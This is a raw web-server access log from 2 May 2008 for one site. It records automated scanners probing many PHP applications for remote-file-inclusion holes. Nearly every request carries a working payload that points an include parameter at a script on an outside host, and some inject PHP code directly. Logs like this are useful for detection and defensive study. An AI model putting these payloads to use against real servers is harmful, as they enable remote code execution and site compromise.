92.48.74.30 - - [02/May/2008:11:35:23 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:35:30 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:35:30 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:35:31 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.207.204.13 - - [02/May/2008:11:35:31 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [02/May/2008:11:35:31 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [02/May/2008:11:35:32 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:35:42 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:35:43 -0700] "GET /logs/access_080204.log//Neos_Chronos/header.php?base_folder=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:35:44 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:35:44 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:35:45 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:11:35:49 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:11:35:49 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:11:35:50 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.207.204.13 - - [02/May/2008:11:35:52 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:11:35:52 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:11:35:52 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:11:35:53 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.207.204.13 - - [02/May/2008:11:35:55 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [02/May/2008:11:35:55 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:36:13 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:11:36:16 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:11:36:17 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:11:36:17 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:36:20 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [02/May/2008:11:36:31 -0700] "GET /logs/access_080211.log/index.php3?act=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [02/May/2008:11:36:31 -0700] "GET /index.php3?act=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [02/May/2008:11:36:31 -0700] "GET /logs/index.php3?act=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:36:34 -0700] "GET /logs/access_071225.log/index.php?pag=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:11:36:45 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:36:49 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:36:50 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:36:52 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:36:57 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:36:57 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:37:01 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:37:05 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:37:06 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:37:06 -0700] "GET /logs/access_080227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:37:07 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:37:07 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:37:12 -0700] "GET /logs/access_080106.log/content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
140.120.27.17 - - [02/May/2008:11:37:12 -0700] "GET /content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
140.120.27.17 - - [02/May/2008:11:37:12 -0700] "GET /logs/content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
213.246.61.4 - - [02/May/2008:11:37:22 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:37:22 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:37:22 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [02/May/2008:11:37:27 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [02/May/2008:11:37:27 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [02/May/2008:11:37:28 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:37:31 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:37:31 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:37:33 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:37:33 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
212.122.1.59 - - [02/May/2008:11:37:34 -0700] "GET /logs/access_080302.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:37:34 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:37:34 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:37:35 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:37:35 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:37:36 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:37:36 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:37:36 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:37:37 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.122.1.59 - - [02/May/2008:11:37:42 -0700] "GET /logs/access_080304.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:38:06 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:38:07 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:38:07 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:38:09 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:38:14 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:38:15 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:38:15 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:38:17 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:38:18 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:38:18 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:38:30 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:38:37 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
165.228.215.195 - - [02/May/2008:11:38:38 -0700] "GET /logs/access_080211.log/index.php3?act=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [02/May/2008:11:38:39 -0700] "GET /index.php3?act=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [02/May/2008:11:38:39 -0700] "GET /logs/index.php3?act=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:38:42 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:38:42 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:38:43 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:39:08 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:39:09 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:39:09 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:39:39 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:39:39 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:39:40 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:39:41 -0700] "GET /logs/access_080120.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:39:49 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:39:49 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:39:50 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:39:50 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:39:55 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:39:56 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:39:56 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:39:59 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:40:31 -0700] "GET /logs/access_080201.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.133.125.40 - - [02/May/2008:11:40:32 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:40:35 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.133.125.40 - - [02/May/2008:11:40:35 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:40:41 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.55.211.20 - - [02/May/2008:11:40:45 -0700] "GET /logs/access_071027.log HTTP/1.1" 200 191919 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:40:49 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:40:52 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:41:22 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.152.14 - - [02/May/2008:11:41:33 -0700] "GET /logs/access.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.khalilshahr.com/templates/%20%20%20%20%20%20%20/sistem%20/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:41:43 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:41:45 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
59.149.126.149 - - [02/May/2008:11:41:45 -0700] "GET /logs/access_080204.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.vokrug-sveta.info/krim/images/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:41:46 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.149.126.149 - - [02/May/2008:11:41:47 -0700] "GET //components/com_extcalendar/